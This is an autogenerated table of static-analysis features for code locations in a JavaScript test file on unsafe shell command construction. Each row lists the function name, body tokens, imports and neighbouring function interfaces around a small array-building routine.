autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:431:23:431:26 | last | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:8 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:8 | arr | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:8 | arr | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:8 | arr | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:8 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr = [] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr = [] | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr = [] | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr = [] | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:6:432:13 | arr = [] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:12:432:13 | [] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:12:432:13 | [] | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:12:432:13 | [] | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:12:432:13 | [] | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:432:12:432:13 | [] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:14 | something | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:14 | something | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:14 | something | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:14 | something | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:14 | something | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | exceptional return of something() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | exceptional return of something() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | exceptional return of something() | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | exceptional return of something() | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | exceptional return of something() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | something() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | something() | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | something() | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | something() | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | something() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:25 | something() === 'gm' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:25 | something() === 'gm' | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:25 | something() === 'gm' | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:25 | something() === 'gm' | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:25 | something() === 'gm' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:22:433:25 | 'gm' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:22:433:25 | 'gm' | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:22:433:25 | 'gm' | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:22:433:25 | 'gm' | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:22:433:25 | 'gm' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:5 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:5 | arr | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:5 | arr | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:5 | arr | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:5 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:10 | arr.push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:10 | arr.push | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:10 | arr.push | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:10 | arr.push | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:10 | arr.push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | arr.push('convert') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | arr.push('convert') | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | arr.push('convert') | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | arr.push('convert') | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | arr.push('convert') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | exceptional return of arr.push('convert') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | exceptional return of arr.push('convert') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | exceptional return of arr.push('convert') | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | exceptional return of arr.push('convert') | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | exceptional return of arr.push('convert') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:7:434:10 | push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:7:434:10 | push | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:7:434:10 | push | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:7:434:10 | push | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:7:434:10 | push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:12:434:20 | 'convert' | CalleeFlexibleAccessPath | arr.push | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:12:434:20 | 'convert' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:12:434:20 | 'convert' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 